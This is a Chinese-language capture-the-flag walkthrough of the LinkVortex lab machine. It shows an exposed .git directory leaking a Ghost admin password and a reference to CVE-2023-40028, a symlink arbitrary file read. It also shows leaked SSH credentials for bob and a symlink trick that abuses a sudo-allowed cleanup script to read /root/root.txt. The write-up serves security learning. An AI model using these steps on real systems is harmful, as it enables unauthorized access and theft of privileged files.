fscan扫描没什么内容 目录扫描扫到

1
http://linkvortex.htb/robots.txt
1
2
3
4
5
6
User-agent: *
Sitemap: http://linkvortex.htb/sitemap.xml
Disallow: /ghost/
Disallow: /p/
Disallow: /email/
Disallow: /r/

一个登录框,但是暂时利用不起来

image-20250321153848230

fuzz出一个[Launching Soon](http://dev.linkvortex.htb/)

image-20250321154500599

git泄露

image-20250321154546045

githack和githacker拉下来不大一样

可以获取到一些敏感信息泄露

1
2
const email = 'test@example.com';
const password = 'OctopiFociPilfer45';

学到了一个新姿势

可以关注/.git/logs/HEAD是对应的上传者的相关信息

1
0000000000000000000000000000000000000000 299cdb4387763f850887275a716153e84793077d root <dev@linkvortex.htb> 1730322603 +0000	clone: from https://github.com/TryGhost/Ghost.git

将dev改为admin后登录

1
2
admin@linkvortex.htb
OctopiFociPilfer45

查阅到版本为5.58.0

0xDTC/Ghost-5.58-Arbitrary-File-Read-CVE-2023-40028: CVE-2023-40028 affects Ghost, an open source content management system, where versions prior to 5.59.1 allow authenticated users to upload files that are symlinks. This can be exploited to perform an arbitrary file read of any file on the host operating system.

image-20250322124858385

拿其他账号的账号密码

image-20250322124956985

1
2
"user": "bob@linkvortex.htb",
"pass": "fibber-talented-worth"

ssh连接后拿user.txt

image-20250322125129012

sudo -l发现(ALL) NOPASSWD: /usr/bin/bash /opt/ghost/clean_symlink.sh *.png

image-20250322125206795

clean_symlink.sh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

#!/bin/bash

QUAR_DIR="/var/quarantined"

if [ -z $CHECK_CONTENT ];then
  CHECK_CONTENT=false
fi

LINK=$1

if ! [[ "$LINK" =~ \.png$ ]]; then
  /usr/bin/echo "! First argument must be a png file !"
  exit 2
fi

if /usr/bin/sudo /usr/bin/test -L $LINK;then
  LINK_NAME=$(/usr/bin/basename $LINK)
  LINK_TARGET=$(/usr/bin/readlink $LINK)
  if /usr/bin/echo "$LINK_TARGET" | /usr/bin/grep -Eq '(etc|root)';then
    /usr/bin/echo "! Trying to read critical files, removing link [ $LINK ] !"
    /usr/bin/unlink $LINK
  else
    /usr/bin/echo "Link found [ $LINK ] , moving it to quarantine"
    /usr/bin/mv $LINK $QUAR_DIR/
    if $CHECK_CONTENT;then
      /usr/bin/echo "Content:"
      /usr/bin/cat $QUAR_DIR/$LINK_NAME 2>/dev/null
    fi
  fi
fi

经典软链接利用

1
2
3
4
5
6
7
bob@linkvortex:~$ ln -s /root/root.txt 1.txt
bob@linkvortex:~$ ln -s /home/bob/1.txt 1.png
bob@linkvortex:~$ sudo CHECK_CONTENT=true /usr/bin/bash /opt/ghost/clean_symlink.sh /home/bob/1.png
Link found [ /home/bob/1.png ] , moving it to quarantine
Content:
xxxxxxxxxxxxxxxxxxx
bob@linkvortex:~$

image-20250322130350143